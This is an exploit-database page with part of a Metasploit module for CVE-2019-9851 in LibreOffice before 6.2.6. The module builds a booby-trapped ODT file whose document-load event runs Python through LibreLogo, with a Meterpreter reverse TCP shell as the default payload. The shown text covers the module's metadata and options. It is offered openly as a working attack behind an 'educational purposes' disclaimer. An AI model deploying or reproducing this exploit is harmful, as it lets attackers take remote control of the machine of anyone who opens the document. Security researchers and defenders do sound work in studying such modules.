Exploits / Vulnerability Discovered : 2019-08-21 |
Type : remote |
Platform : multiple
This exploit / vulnerability Libreoffice < 6.2.6 macro python code execution (metasploit) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'LibreOffice Macro Python Code Execution',
'Description' => %q{
LibreOffice comes bundled with sample macros written in Python and
allows the ability to bind program events to them.
LibreLogo is a macro that allows a program event to execute text as Python code, allowing RCE.
This module generates an ODT file with a dom loaded event that,
when triggered, will execute arbitrary python code and the metasploit payload.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Nils Emmerich', # Vulnerability discovery and PoC
'Shelby Pace', # Base module author (CVE-2018-16858), module reviewer and platform-independent code
'LoadLow', # This msf module
'Gabriel Masei' # Global events vuln. disclosure
],
'References' =>
[
[ 'CVE', '2019-9851' ],
[ 'URL', 'https://www.libreoffice.org/about-us/security/advisories/cve-2019-9848/' ],
[ 'URL', 'https://www.libreoffice.org/about-us/security/advisories/cve-2019-9851/' ],
[ 'URL', 'https://insinuator.net/2019/07/libreoffice-a-python-interpreter-code-execution-vulnerability-cve-2019-9848/' ]
],
'DisclosureDate' => '2019-07-16',
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
'DefaultOptions' => { 'Payload' => 'python/meterpreter/reverse_tcp' },
'Targets' => [ ['Automatic', {}] ],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('FILENAME', [true, 'Output file name', 'librefile.odt']),
OptString.new('TEXT_CONTENT', [true, 'Text written in the document. It will be html encoded.', 'My Report']),
])
end